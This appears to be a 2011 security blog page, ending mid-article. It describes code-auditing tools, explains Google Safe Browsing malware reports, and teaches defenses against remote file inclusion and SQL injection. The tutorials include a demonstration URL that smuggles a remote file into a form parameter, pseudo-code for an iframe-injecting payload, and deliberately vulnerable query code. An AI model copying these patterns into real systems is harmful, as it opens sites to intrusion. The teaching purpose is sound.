Gadgets Security

Keep your mobile gadget secure

Secure Your Server

We must study how to harder our servers

Internet Security

Secure your computer, Secure your browser, and enjoy to browsing to internet

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Monitor your System Network

Make your network in your hand and under control

Showing posts with label Web Security. Show all posts
Showing posts with label Web Security. Show all posts

Tuesday, June 14, 2011

Skavenger – source code auditing tool!

Skavenger? Yes, because scavenger is already used?!?
What is skavenger? Skavenger is a source code auditing tool, firstly though for php, but also used for any kind of source code file; as long as you know what to look for…
Yes I thought is as a replacement tool for egrep/sed under Windows! because not everybody installs cygwin (for example) under there windows boxes to perform source code auditing. I’ve seen people who most of the time used notepad to audit source code!
And more…
Skavenger is more than a replacement for egrep/sed because it has the ability to parse conforming to a regular expression or a series of regular expressions more than one file; even a directory; and prints out line number… isn’t that sup4 l33t?
Anyway… for download and more info check out http://code.google.com/p/skavenger/, because you can have a lot of fun with it; did I mention it was a console application?
P.S. You need php in order to use this script. Default values in regex.def check for primordial sql injection and XSS….
P.P.S. For more things to search for under php, check my article at http://insanesecurity.wordpress.com/2007/10/30/source-code-audit-php/

Sunday, June 12, 2011

LAPSE Sourcecode Analysis for JAVA J2EE Web Applications

LAPSE stands for a Lightweight Analysis for Program Security in Eclipse. LAPSE is designed to help with the task of auditing Java J2EE applications for common types of security vulnerabilities found in Web applications. LAPSE was developed by Benjamin Livshits as part of the Griffin Software Security Project.
LAPSE targets the following Web application vulnerabilities:
  • Parameter manipulation
  • SQL injections
  • Header manipulation
  • Cross-site scripting
  • Cookie poisoning
  • HTTP splitting
  • Command-line parameters
  • Path traversal
What should you do to avoid these vulnerabilities in your code? How do we protect Web applications from exploits? The proper way to deal with these types of attacks is by sanitizing the tainted input. Please refer to the OWASP guide to find out more about Web application security.
If you are interested in auditing a Java Web application, LAPSE helps you in the following ways:
  • Identify taint sources
  • Identify taint sinks
  • Find paths between sources and sinks
LAPSE is inspired by existing lightweight security auditing tools such as RATS, pscan, and FlawFinder. Unlike those tools, however, LAPSE addresses vulnerabilities in Web applications. LAPSE is not intended as a comprehensive solution for Web application security, but rather as an aid in the code review process. Those looking for more comprehensive tools are encouraged to look at some of the tools produced by Fortify or Secure Software.

Read more about LAPSE HERE.

You can download LAPSE here:
LAPSE: Web Application Security Scanner for Java

Security Compass Web Application Analysis Tool – SWAAT

Announcing a new web application source code analysis tool called the Securitycompass Web Application Analysis Tool or SWAAT.
You may know it as a static analysis tool.

Currently in its beta release, this .Net command-line tool searches through source code for potential vulnerabilities in the following languages:
  • Java and JSP
  • ASP.Net
  • PHP
Using xml-based signature files, it searches for common functions and expression which may lead to exploits. We believe that this tool will help you in your ongoing source code analysis efforts.

Please visit Security Compass to download SWAAT. Future releases of SWAAT would include plugins into popular IDEs such as Visual Studio .NET and Eclipse.
As the tool is still new, Security Compass appreciates any comments you have in functionality and desired features. Please send any feedback to swaat -at securitycompass.com.

The direct link to download SWAAT is HERE.

The Top 10 PHP Security Vulnerabilities from OWASP

This is a useful article that has basically taken the OWASP Top 10 Vulnerabilities and remapped them to PHP with actual examples.

The Open Web Application Security Project released a helpful document that lists what they think are the top ten security vulnerabilities in web applications.

These vulnerabilities can, of course, exist in PHP applications. Here are some tips on how to avoid them. I’ve included related links and references where relevant.

You can download the detailed OWASP Top 10 Vulnerabilities here.
You can find PHP and the OWASP Top Ten Security Vulnerabilities here.

Sprajax – An Open Source AJAX Security Scanner




Denim Group Ltd. announced today the public release of Sprajax, an open source web application security scanner developed to assess the security of AJAX-enabled web applications.

Sprajax is the first web security scanner developed specifically to scan AJAX web applications for security vulnerabilities. Denim Group, an IT consultancy specializing in web application security, recognized that there were no tools available on the market able to scan AJAX. AJAX allows web-based applications a higher degree of user-interactivity, a feature with growing popularity among developers.

You can download Sprajax here.

As AJAX becomes more popular with developers, the security of AJAX-enabled web applications will be a growing concern,” says Dan Cornell, Principal at Denim Group.”Sprajax is a great tool for application security maintenance, and its availability as an open source application places it within reach for organizations of all sizes.”


While expert security scans are more thorough and usually recommended, internal developers and security auditors can use this software to produce an initial vulnerability assessment. This can be invaluable, especially in the wake of government regulations regarding web application security. Organizations must take steps to protect sensitive data in public facing applications, and an assessment using a tool like Sprajax could be the first step

Is Open Source Really More Secure?



Is Open Source more secure? That’s a question that can be answered with both yes and no. Not only that, but the reasons for the “yes” and the “no” are fairly much the same. Because you can see the source the task of hacking or exploiting it is made easier, but at the same time because its open, and more easily exploited the problems are more likely to be found.

When it comes to open source the hackers and crackers are doing us a favour, they find the problems and bring them to the attention of the world, where some bright spark will make a fix and let us all have that to. All well and good.

However I think this could also be a problem, because lets face it. Any monkey can download “free” software to use for this or that, with little or no idea how it actually works. They don’t check for fixes and updates, often believing “it will never happen to me”. In part this is because they just don’t see any reason for some one to hack them. But in the modern world where any script kiddie little git can download a virus construction kit, or a bot to run exploits on lists of servers its no longer a case of being targeted. They don’t care who you are, it’s the box they are after.

Recently a friend of mine suffered from this very problem, he didn’t believe he was worth the effort to hack. But simply by using an Open source web app he unwittingly made him self a target. Though a fix was available, he wasn’t aware of it. It was only when the host contacted him about problems that he even realised he’d been exploited.

With the growing popularity of the internet and open source solutions more and more unskilled users are installing software they don’t even understand. Even worse as any one application grows in popularity it grows as a worth while target for the low life script kiddies out there.

The problem has been exacerbated but the simple truth that with modern scripting languages such as PHP it is getting easier and easier to make some thing, being able to hack code together until it works might be fun, and you might make some thing that does the job, but its not a way to make safe secure software.

Most often exploits are based on stupid mistakes, errors that should have been found early on but weren’t because the code evolved, expanded and changed. No design, no planning, just code it until it works. This is the original meaning of “hacking”.

Now, with out mentioning names, I have pulled apart the code used in the CMS the friend I mention earlier used, and with out doubt I can say its poorly written. But it was free, so no one can complain.

I am sure there is some very good open source applications, linux, apache to name a few, but there is even more “open source” that’s just garbage. Just because its free doesn’t mean its good. Just because it popular doesn’t make it better. In fact as far as I can tell, if you want to use open source applications your probably better of choosing one no one else has really bothered with, that why your less likely to become a victim.

Closed source always has the advantage of being a little harder to find the problems, how ever, and this is important. It doesn’t mean its any better. As a friend of mine pointed out, Open source might be easier to hack in some ways, but because of that the problems come to light and generally are fixed quickly. Where as with a closed source application its actually in the interests of the authors to keep any problems hidden, if its not a common problem it may even go unfixed, because the author sees is as being unlikely any one else will ever find it. Or a fix will be bundled up with a later version and thus many people will never even know they could be at risk.

In the end I do believe open source is good for us all, but its important to check regularly for updates, patches and fixes. If you don’t, on your own head be it.

Saturday, June 11, 2011

How to understand the Google Safe Browsing Diagnostic report for malicious or hacked websites



When the Google web crawler visits a site and gets attacked by malware, Google flags the site as suspicious with a "This site may harm your computer" warning in search results. The search result links no longer go to the site, but go instead to an explanatory page about the warning. The Firefox browser, which looks up sites in the Google Safe Browsing database, displays a "Reported Attack Site!" warning, with a link to the explanation. By either of these routes, you can end up at a Google Safe Browsing Diagnostic report.  
Another way to view the Safe Browsing Diagnostic, for any site, is to enter this URL in your browser address bar. Replace EXAMPLE.COM with the name of the site:
http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM
The report is short and lacks explanation, but it contains useful information for webmasters who are trying to clean up their legitimate sites that have been turned dangerous by hackers. 
Below are explanations of the sections of the Safe Browsing Diagnostic report, directed toward webmasters who are trying to clean up their websites. This page was previously part of a long article about how to diagnose the reason a site is flagged and how to get the Google warning removed.

What is the current listing status for _____?

Site is listed as suspicious - visiting this web site may harm your computer.

This tells you whether your site is listed right now as suspicious. If it is, it means that Google has determined that at least one of your pages, by one method or another, under at least some circumstances, is causing visitors to get attacked by malware. There will be warnings (as described above) in Google search results and in the Firefox and Chrome browsers. Internet Explorer does not use the Google Safe Browsing database (it uses a Microsoft database), so IE might not give any warning message. That does not mean the site is clean. If the Google Safe Browsing diagnostic says that visiting a site can cause malicious content to be downloaded to your computer without your permission, you can be almost 100% sure that their assessment is correct. 
If this report disagrees with what you see in search results (for example, you know that your site currently is flagged in search results, but the diagnostic says it is not listed as suspicious), it's possible your site has more than one diagnostic report and you need to find the other(s). There are at least two situations where you can have more than one diagnostic report: 
  1. Only part of your site, not the whole site, is flagged. In the search results, click the link to one of the pages that is flagged, to get the diagnostic report for that part of the site, such as example.com, example.com/forum, or blog.example.com.
     
  2. In the past, it was possible to have separate diagnostic reports (which sometimes did not agree with each other) for example.com and www.example.com. Google seems to have resolved that problem in most cases, but check out this possibility anyway if the diagnostic does not seem to be accurate for your situation.
If the diagnostic report says your site is not listed as suspicious, but you still get warnings in Firefox, it is due to a delay in Firefox updating from the Google database, and is normally resolved within a day or so. 

Part of this site was listed for suspicious activity 9 time(s) over the past 90 days.

This tells you the recent history. In the example above, the site has been flagged and unflagged 9 separate times, which is a lot. Its webmaster has probably been removing malicious code over and over again but not fixing the site's security vulnerabilities, so the site keeps getting hacked repeatedly.

What happened when Google visited this site?

Of the 110 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent.

This is mostly self-explanatory. It gives you an indication how widespread the infection is in the pages of your site. You can get a partial listing of the pages Google considers suspicious at Webmaster Tools at Google Webmaster Central.

The last time Google visited this site was on 2009-11-20, and the last time suspicious content was found on this site was on 2009-11-20.

When the first and second dates are the same, it means that the most recent review found malware. The site is still infected.

The last time Google visited this site was on 2009-11-20, and the last time suspicious content was found on this site was on 2009-11-18.

This means that the most recent review did not find malware. If your site is still shown as "suspicious" even though the last scan did not find malware, the status should change to "not suspicious" within approximately 1 day, unless the site has been flagged many times recently. In that case, there might be a several-day delay while Google waits to see if the site stays clean. Another reason for a delay is if you deleted the infected pages instead of cleaning them. Google wants to see cleaned pages. They do not want you to delete pages, get the flag removed, and then put infected pages back online.

Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

This itemizes the kinds of malware that attacked the Google crawler when it visited your pages.

Malicious software is hosted on 2 domain(s), including gumblar.cn/, beladen.net/.

When your pages cause malware to be loaded into a visitor's browser, it means just that: they cause it to happen. It does not necessarily mean the actual virus code is in your page. It probably isn't, and it probably is not even in some other file on your website. Usually, the virus code is stored at some other site. But if your page contains an iframe that fetches its content from that other site, it will cause the malicious code to be loaded into the visitor's browser.
This line in the diagnostic is the list of sites where the malware is actually hosted (stored). The visitor's browser is fetching the virus code from there. If you are hunting for malicious iframes in your website files, these domain names are ones you should be hunting for. Unfortunately, they might be encoded in a way that makes them hard to find with a text search, and it is also possible that other domains, rather than these, are referenced in your iframes. The reason is that sometimes there is a chain or sequence of events, involving other intermediary websites, that eventually, but not immediately, causes malware from the above sites to be loaded. I will discuss intermediaries in the next section.
This list of hosting domains can be very helpful. In the first of the examples above, the reference to gumblar.cn means that it is certain your site was hacked as the result of a virus infection on the PC of one of your website administrators, which stole the FTP password. In the second example, the reference to beladen.net means that it is not just your website that is compromised; the entire server is infected, and so are all the websites on it. A web search on the domain names you find in this list can help discover what type of infection your website has and also can indicate what type of security vulnerability it has that allowed it to be infected. Unfortunately, it doesn't often lead to such definitive conclusions as it does for gumblar or beladen.   

3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including...  

As mentioned above, when your site is loaded in a browser, elements in your page such as iframes can trigger a chain of events that bring malicious content to the visitor's browser. That chain could involve several hops, through several different websites, before the malicious code gets delivered.
For example, let's say your page contains an iframe that loads a page from site A, but that page consists of JavaScript code that fetches and executes a VBScript from site B, which fetches a Trojan downloader (the payload, the first part of the actual malicious software, which might consist of several parts carrying different types of attacks) from site C.
In this scenario, your site will certainly be flagged for causing the malicious content to get loaded into the visitor's browser (initiating the sequence). Sites A and B are intermediaries in the chain, and site C is the host of the code that carries out the attack.
When you are searching your code for hidden iframes, search for domains listed in this section of the report as intermediaries, in addition to the ones listed in the previous section as hosts.  

This site was hosted on 1 network(s) including...

This tells you the internet network where your site is hosted.  You might recognize the name of your webhost here, or the name of a larger network that your host is part of. This does not seem to be particularly useful information. Any large network will have many compromised websites in it, and no large network will consist 100% of compromised websites.  

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, _____ appeared to function as an intermediary for the infection of __ site(s) including _____, _____, ...

Is your site one of the intermediaries as described in the previous section? In addition to the general scenario presented above, here are two more specific ones:
  • Let's say you host a PHP script that other sites call to get dynamically generated content from you. Your site gets hacked, and someone injects your PHP code with iframes that point to a third site that hosts malicious code. As long as your own site's pages don't call your own PHP script, you're not causing malware to be loaded into a visitor's browser, and you're not the host of the malware, either, but your PHP script is facilitating the distribution of malware by acting as a middle link. You're an intermediary.
     
  • Let's say you are an advertising distributor. You accept ads submitted to you by companies who want to advertise, and you place those ads on the sites in your publisher network. One of your advertisers submits a malicious ad. When the ad appears on your publisher websites, you're an intermediary. This Safe Browsing report is an example of an advertiser listed as an intermediary at the time of this writing. Note that although they are not flagged as suspicious, and their own pages are not flagged in search results with "This site may harm your computer", they can be causing their publisher network sites to get flagged. 

Has this site hosted malware?

This part of the report usually says No. As mentioned earlier, most sites, even compromised ones, do not actually host (contain) the virus code. The hackers store the virus code at a central location. Then they hack many sites, injecting iframe code that points to the central location. With this arrangement, they can change the virus code quickly and easily. The changes get propagated throughout the internet without their having to re-hack thousands of sites to update the code to the new and improved version.
If your report says Yes, your site is hosting malware, then you are one of the chosen few where they actually are storing the virus code. When web surfers load pages from other sites, those pages contain iframes that point to your site and fetch the virus code from your site. Obviously, you need to find where the virus code is being stored in your website files.
If your report says No, this site has not hosted malware, that does not mean your site is clean. It only means your site is not a central location where the virus code is being stored.

Notes

  • In the scenario described earlier where your site is flagged because its pages initiate the sequence of malware delivery and "sites A and B are intermediaries, and C is the host", the intermediaries and hosts will not necessarily be flagged as suspicious. This is counterintuitive because the intermediaries and hosts are a danger to the internet because they are either conduits to the flow of malware or store it so it can be used in attacks against web surfers or against other websites.

    The internet danger level would be reduced if these sites were flagged as suspicious. It would alert the webmasters (at least the ones who are innocent victims) that their sites need to be cleaned and better secured. Without such warning, many webmasters of sites that are intermediaries or hosts have no idea that they have a problem.

    The best sense I can make of this situation is that the Google search result warning is intended to help protect web surfers by giving them information they can do something about: they can avoid going to a flagged site.

    Intermediary and host sites usually play their part through "orphan" files hidden inside their sites. These are files that have no ordinary hyperlinks pointing to them from anywhere on the internet. Because they are not pages that web surfers can get to by following links, and because Google's intent is to protect web surfers using their search results (not necessarily to "make the internet safer"), they do not bother to flag intermediaries and hosts. Once a web surfer visits a site that initiates the delivery of malware, the chain through the intermediaries and hosts is automatic. There is nothing a web surfer could do about it even if they had advance warning, so there is no point in creating such a warning. 

    There is something a web surfer can do for protection, however: turn JavaScript Off. In many cases, that will prevent you from being redirected into the chain of intermediaries and hosts, and prevent the malware from being delivered to your browser.

Unusual situations observed

1) Firefox blocked access to a "Reported Attack Site", but the site was not flagged in Google search results. The Safe Browsing Diagnostic report said suspicious content was "never found", yet it also said that the suspicious software was hosted on 3 domains, and gave their names. The reason: the website was hacked and did redirect visitors to the sites that Google knew were malicious. However, the malicious sites had already been shut down, so they weren't serving any actual malware.

how to use data validation to avoid Remote File Inclusion (RFI) vulnerabilities in your code, with examples


A remote file inclusion (RFI) vulnerability is a security flaw in programming code. Whenever a script receives data from outside itself, there is a danger that the data was sent by a malicious attacker, a hacker, who designed it so that it would corrupt the execution of the script and trick it into doing something it wasn't supposed to do.
One of the actions that a corrupted script can be tricked into doing is to fetch a file from a distant website (that is the "remote file") and include() it into the body of the corrupted script (that is the "inclusion"). Whatever program code is in the remote (but now local!) file becomes part of the corrupted script, and it executes right along with all the other code.
RFI therefore allows hackers to run their code on your server, with the same access permissions (to folders and files) that your own code has. 
The key to success of an RFI attack is that the hacker must be able to send the URL of the remote file into your script, disguised as innocent data.
That's easy. All they have to do is find (or guess) the avenues by which your script accepts incoming data, make note of the variable names you use (or guess, using common names), and then start sending your script ordinary requests of the type it normally expects, but with one difference: the values of the variables it sends are all the URL of the remote script they want your script to execute. 
They have no control over whether your script actually uses the incoming data in PHP include(), include_once(), require(), or require_once() statements (or their equivalents in other languages), but it is so common for that to be the case that this is a high percentage play for them. 
An important defense against RFI attack is to write your scripts to examine every incoming variable to ensure that its data type, character composition, format, and value are "legal" according to the characteristics your script expects that variable to have. If an incoming variable is not what you expect, your script must not use it. 
This is called data validation or "sanitizing" or "scrubbing". It is the topic of this article.

Untrusted data (from outside the script) requires validation

When you set a variable explicitly in a script with:
$a = 4;
that data is considered trusted. You are in control of it. You set it yourself, and presumably not maliciously. Likewise, if you read data from a file or other source that you completely control, that data is trusted.
Data is "untrusted" when it comes from a source you don't control completely.
Common ways PHP scripts receive untrusted data from the outside world:
  • $_GET[''] data, received from the user in the URL query string.
  • $_POST[''] data, usually received from the user through HTML form submissions.
  • $_COOKIE[''] data, received from the user in the cookie sent by their browser.
    You initially control the cookie when you create it, but the user can edit and modify it before their browser sends it back.
  • $_REQUEST[''] data: all the $_GET[''], $_POST[''], and $_COOKIE[''] variables, combined into one array.
  • Any of the other variables listed here (and on the linked pages) that came from the user or their browser, or that are based on information that came from them. 
Before each of these incoming variables is used in a script, it is necessary to ensure that it has a value in the set of, or within the range of, the legitimate values your script is designed to handle for that variable. If it is not, you should instead give it a safe default value, or not use it at all, or reject the submission and inform the user that the input was invalid, whichever option is appropriate to your application.
Some of the ways you can test variables include:
  1. Ensure length is within the expected range, or cut it to the maximum acceptable length.
  2. Test it against a regular expression (regex) to ensure it doesn't contain unacceptable characters.
  3. Ensure numeric input has only digits and other number-related characters. Examples: +-0123456789.e
  4. Ensure numeric input is within the expected numeric range.
  5. Compare the value (string or numeric) against a list of all possible acceptable values. Ensure that it matches one of them.
  6. Test the input with a PHP Validating Filter.
The example code will show methods of doing all these tests, but first let's do some experimenting to see what RFI is all about.

Valid and invalid data in form submissions, and an RFI demonstration

Although this page doesn't have a form on it, it is designed to handle form submissions using HTTP GET requests.
You submit the data manually by copying and pasting URLs for this page into your browser's address bar. The URLs have the same format as ones generated by a browser when you submit a form. Doing it manually will help understand what an RFI attack is and how it works.
The hypothetical form has two fields:
  • Age: input is numeric only, and only values from 0 to 114 are allowed.
  • Favorite Color: input can be text (red, blue, green) or numeric (1=red, 2=blue, 3=green).
    If the script receives a number, it is translated within the script to the corresponding color. 
Here are some example URLs to paste into your browser address bar. You'll see the result of your "form submissions" at the top of the resulting page.
  • This is a legitimate request with legal values. Your age is 25, and your favorite color is blue. If you wish, you can manually edit the URL to experiment with other combinations:
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=25&color=blue
  • This is a legitimate request with age=50 and a numerically encoded color (3=green):
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=50&color=3
  • This is an invalid request with a non-numeric age and a color that the script is not designed to handle. The resulting output color is not violet but red because the script sets red as the default color. When the user submits an illegal color, their input is ignored. Age is handled the same way. The default age is 0:
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=noyb&color=violet
So far, all seems quiet. Whatever you enter, the output you get is an age and a color. If you try to do something invalid, you get a default age and a default color. Big deal.
  • The next experiment is an RFI attack. Copy and paste the URL into your address bar. If your browser displays the text below as 2 lines, copy them both. It's a one-line URL. If your sharp eyes spot a typographical error in the URL query string, don't correct it. It's intentional5:
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=75&color=htpp://25yearsofprogramming.com/robots.txt
What happened??! You've got a lot of nerve! You hacked my website!! OK, not really. We're pretending. What happened was this:
  1. My script was expecting you to supply a color, as before. It uses a PHP include() command to include one of my website files into the page text, based on which color you submitted.
     
  2. I FAILED to use the methods described later in this article to test whether what you supplied really was a legitimate color, or any color at all.

    So my script made the mistake of including the value that you DID supply, which was the URL of my robots.txt file, and that's what you see on the result page.

    You completely hijacked the color processing that was supposed to occur, and tricked my script into doing something different, not what I, the programmer, wanted to happen, but what YOU, the hacker, wanted to happen.

    The simple printout of my robots.txt looks harmless enough, but do you appreciate what a horrible thing has just happened?
     
  3. What if you had given it the URL of a PHP script located on (for our example) YOUR website? My script would just as happily have fetched that file from your website, and included that into the page. But this time it's not a harmless robots.txt. It contains PHP code. That code would have become part of MY script, and it would have executed.
If my original code (in pseudo-code form) were:
fetch_the_color_file();
place_its_text_on_the_page();
do_more_stuff();
it could then become:
fetch_the_color_file();
place_its_text_on_the_page(); // but it's PHP code!, so it runs and does this:
make_a_list_of_all_files_in_my_site();
for(every_file)
{
 open_the_file_in_append_mode();
 add_a_virus_infected_iframe_to_the_bottom();
 save_the_file();
}
do_more_stuff();
All that extra code came from the file on your website. It got inserted right into the middle of my own code, and it ran. Now every single page of my site has a virus-infected iframe in it. That's what I get for failing to make sure that what you sent me was a legitimate color! 

PHP $_GET[''] Data Validation Example Code

The examples show several methods of validating $_GET[''] variables. The same methods apply to $_POST[''] or the others. Links go to documentation pages at php.net.
The basic strategy is the same for all methods:
  1. It's easier if you don't use the incoming $_GET[''] variables directly throughout your script.
    Instead, create an ordinary local variable to hold each incoming value.
  2. Initialize each variable with a legitimate starting value.
    That will be its default if the incoming replacement value is missing or invalid.
  3. Test each incoming $_GET[''] to make sure it is completely legitimate for what it is supposed to be.
    If it is supposed to be an integer, it must contain only digits.
    If it is supposed to be one of 5 possible values, make sure it exactly matches one of the 5.
  4. Transfer the $_GET[''] value to the local variable only if it survived the tests.
    Otherwise, use the default values or abort the script, whichever is appropriate to the application.
After you remove the comments, you'll see that none of the examples have much code.
Validation can be easy.

1) Compare incoming value against an array of all possible legal values

If there are many legal values, you could keep the list in a file and use the file() function to read it into the array when you need it.
<?php
// LOCAL VARIABLE WITH ITS LEGITIMATE DEFAULT VALUE
$Color = 'red';

// ARRAY OF ALL POSSIBLE LEGAL VALUES FOR THE VARIABLE
$LegalColors = array
(
 'red',
 'blue',
 'green'
);

if(isset($_GET['color'])) // IF USER SUBMITTED A COLOR VALUE
{
 // REMOVE IRRELEVANT LEADING/TRAILING WHITESPACE FROM THE INCOMING TEXT
 $_GET['color'] = trim($_GET['color']);

 // CHECK AGAINST THE LEGAL-VALUES ARRAY, WITH STRICT TYPE CHECKING
 if(in_array($_GET['color'], $LegalColors, TRUE))
 {
  // TRANSFER THE INCOMING VALUE TO THE LOCAL VARIABLE
  $Color = $_GET['color'];
 }
 // AN else {} HERE COULD ABORT THE SCRIPT IF THE VALUE WAS ILLEGAL
}
?>

2) Test incoming value against a regular expression

This example uses a regular expression to test against all possible legal values. That is an exact duplication of the array validation method above, but regex testing can be used more flexibly than that: you can test for variations and patterns rather than against specific entire strings. Be sure that your regular expression matches all the possible legal values, but nothing else.
<?php
$Color = 'red';

if(isset($_GET['color']))
{
 $_GET['color'] = trim($_GET['color']);
 if(preg_match('/^(red|blue|green)$/u', $_GET['color']))
  $Color = $_GET['color'];
}
?>

// OTHER USEFUL REGULAR EXPRESSIONS. A WEB SEARCH WILL FIND MANY COMMON ONES.

if(preg_match('/^[A-Z]{1,8}$/', $_GET['var']))  // 1-8 UPPERCASE ALPHABETIC
if(preg_match('/^[A-Z0-9]{1,8}$/i', $_GET['var'])) // 1-8 UPPER/lower ALPHANUMERIC

3) Test incoming value with switch cases

The switch method allows some additional flexibility: you can translate incoming values to different values for internal use. This example, in addition to allowing the color names, allows numeric color values of 1,2,3 and uses the cases to translate them to red,blue,green for internal use. If I only used the numbers in publicly visible URLs, I could prevent anyone knowing what values they are translated to internally.
<?php
$Color = 'red';

if(isset($_GET['color']))
{
 $_GET['color'] = trim($_GET['color']);

 switch($_GET['color'])   
 {
  case 'red': 
  case '1': 
   $Color = 'red';  
   break;
  case 'blue': 
  case '2':
   $Color = 'blue';
   break;
  case 'green': 
  case '3':
   $Color = 'green';
   break;
  default:
   // YOU COULD ABORT SCRIPT HERE
   break;
 }
}
?>

4) Validating numeric values

<?php
$Age = 0;

if(isset($_GET['age']))  // IF USER SUBMITTED AN AGE VALUE
{
 $_GET['age'] = trim($_GET['age']);

 // "IF THE INPUT CONSISTS OF 1 TO 3 DIGITS"
 if(preg_match('/^[0-9]{1,3}$/', $_GET['age']))
 {
  // FORCE THE VARIABLE TO THE REQUIRED TYPE
  settype($_GET['age'], 'integer');

  // TEST FOR ACCEPTABLE MINIMUM, MAXIMUM VALUES
  if(($_GET['age'] >= 0) && ($_GET['age'] <= 114))
  {
   // ACCEPT THE VALUE TO OUR LOCAL VARIABLE
   $Age = (int)$_GET['age']; 
  }
 }
 // AGAIN, IF INCOMING VALUE WASN'T VALID, LOCAL $Age WASN'T CHANGED.
}
?>

5) Validating numeric values with a PHP Filter

This alternative uses a PHP 5.2+ validating "filter function" to validate an integer with less code:
<?php

$Age = 0;

// RETURN VALUE IS THE VALIDATED INTEGER (ON SUCCESS), OR FALSE, OR NULL
$i = filter_input(INPUT_GET, 'age', 
 FILTER_VALIDATE_INT, 
 array('options'=>array('min_range'=>0, 'max_range'=>114)));

if(($i !== FALSE) && ($i !== NULL))
 $Age = $i;

?>
The following code is equivalent. I currently recommend using it instead because it appears to me that filter_var is more reliable, predictable, and portable than filter_input. The user comments at php.net about filter_input (see the link) mention odd behavior that I've also experienced.
We must use isset() because filter_var throws an error if the tested variable isn't set. In the example, the default $Age of 0 is used if $_GET['age'] is not set, and is also specified as the default value if it is set but invalid.
<?php

$Age = 0;
if(isset($_GET['age'])) 
 $Age = filter_var($_GET['age'],
  FILTER_VALIDATE_INT, 
  array('options'=>array('default'=>$Age, 'min_range'=>0, 'max_range'=>114)));

?>

More defenses against RFI

Two other methods of RFI defense can serve as backup, in case you make a mistake in your script and allow some variables to go unvalidated, or in case an application you use contains not-yet-discovered RFI vulnerabilities:
  • Configure PHP so that it will not fetch files from remote websites, even if a program tells it to.
    See the settings allow_url_fopen and allow_url_include.
  • Use Apache .htaccess to ban (reject, without processing) requests where the HTTP query string contains a URL disguised as innocent data.

Notes

  1. All security-related validation must be done in your server-side PHP code. If you want, you can do preliminary validation on the client side with JavaScript in the user's browser, but they can easily avoid that validation by turning JavaScript off. Besides, malicious robots (which are the real threat) don't run your JavaScript. They don't even load your web page. They send their malicious data directly to your PHP script. It's similar to how, in the earlier RFI experiment, you entered your "malicious" requests directly into your address bar.
     
  2. There is another type of attack called Local File Inclusion (LFI). It attempts to trick your script into including a sensitive file (such as a password file) from your server. The method of attack is the same: it sends the path and name of the file it wants to see, hoping your script will include() it. The defense is also the same: if you receive a variable value that is not one of the legal ones you were expecting, don't use it.
     
  3. You can discover whether your website is receiving RFI or LFI attacks at my hack attempt identifier.
     
  4. Whenever a security vulnerability report, such as at Secunia.com, says that an application uses "unsanitized input", it means that the application fails to use the methods described above to validate input. It is therefore vulnerable to attack.  
     
  5. Due to the protections I use against real RFI attacks, this example only works because it is a simulation. If you paste the correctly formatted URL into your address bar, it will be a real RFI attack. You'll get a blank page. Use your browser's Back button to return to this page you're reading now.  
     
  6. Although this article and its examples are about PHP, the same principles apply to all languages. It's not the 1980's anymore. Any program that will be used by someone other than you needs to protect itself against the possibility that incoming data is malicious. Data validation is tedious for the programmer and causes code bloat, but it's necessary.

how to avoid SQL Injection vulnerabilities in your MySQL database query code, with examples



A task that people often want to do with server-side programming code is pull data from a database. How to do that can become a rather complicated topic because there are many languages, such as PHP and ASP.NET, that you can use for connecting to many types of databases, such as MySQL and Microsoft SQL Server.
This article is about the security issues of using PHP to query a MySQL database, but the principles of security best practices are the same when querying any database using any language.
The basic act of querying a database is safe. You do it with SQL code that looks like this:
SELECT * FROM `pets` WHERE `owner`='Gwen' AND `species`='cat'
If you always ran the query that way with the search terms hard-coded in the text, there would never be a security issue. However, when writing code for a website, you most often have an SQL code template like this:
SELECT * FROM `pets` WHERE `owner`='something' AND `species`='something'
and it is your site visitors who provide both "somethings" by typing them into text boxes. Your PHP code must combine their input with your SQL template code to create a customized SQL query that you can execute. 
There is a security issue because the most popular ways of creating that combination, used by many people for many years, published in code examples all over the web, are insecure. They allow a malicious visitor to type into the text box, instead of a legitimate "something", SQL code. By clever use of punctuation, the SQL code can corrupt the query template and trick it into doing something other than the simple search that you intended. It can pull secret data out of the database and display it on a web page, insert new malicious data into the database tables, or even delete the database. 
The specifics of how this can occur are described in greater detail and slightly more technical language in the SQL Injection article at Wikipedia. I will not try to improve on their examples.  
From this point forward, I'll assume that you are probably reading this article because your website has already been hit with an SQL Injection attack and you are trying to figure out how to repair your code to prevent it from happening again. 

Example code vulnerable to SQL Injection, and how to repair it

These are the two most popular ways of combining user input with an SQL template to create the final query. If your code looks like this, it is vulnerable to SQL Injection and needs repair: 
$query = 
 "SELECT * FROM `pets` WHERE `owner`='" . 
 $_POST['ownername'] . 
 "' AND species='" . 
 $_POST['species'] . "'";
$query = 
 sprintf("SELECT * FROM `pets` WHERE `owner`='%s' AND `species`='%s'", 
 $_POST['ownername'], 
 $_POST['species']);
The most serious problem with both is that they insert the user-submitted text directly into the query template. If the user-submitted text contains quote characters, it's easy to see that the combined text can end up with the wrong numbers of quote characters, or unmatched quotes. Those are the things that can corrupt the query and hijack it to do something malicious. The solution is to "escape" all the incoming quote characters, using the mysql_real_escape_string() function. This makes the user-submitted quotes look different from the quotes that were already in the template, so MySQL won't get them mixed up with each other. Here are the improved versions:   
$query = 
 "SELECT * FROM `pets` WHERE `owner`='" . 
 mysql_real_escape_string($_POST['ownername']) . 
 "' AND species='" . 
 mysql_real_escape_string($_POST['species']) . "'";
$query = 
 sprintf("SELECT * FROM `pets` WHERE `owner`='%s' AND `species`='%s'", 
 mysql_real_escape_string($_POST['ownername']), 
 mysql_real_escape_string($_POST['species']));
Even if all you do is revise your code to look like the improved versions, that is a big step toward improving its security.
In the longer example code below, I'll add an additional security measure. I'll pre-validate the incoming $_POST variables for legitimacy and not use them at all (not do the query) if they're invalid.

PHP+MySQL Query Example Code

1) Example entire PHP page for processing form input, using the (older) mysql extension methods:

If you are only repairing old code and don't want to switch to completely new database methods, this example shows ways to improve security. You can use it as a guide or template for changes your code might need. Links go to pages in the PHP online manual.
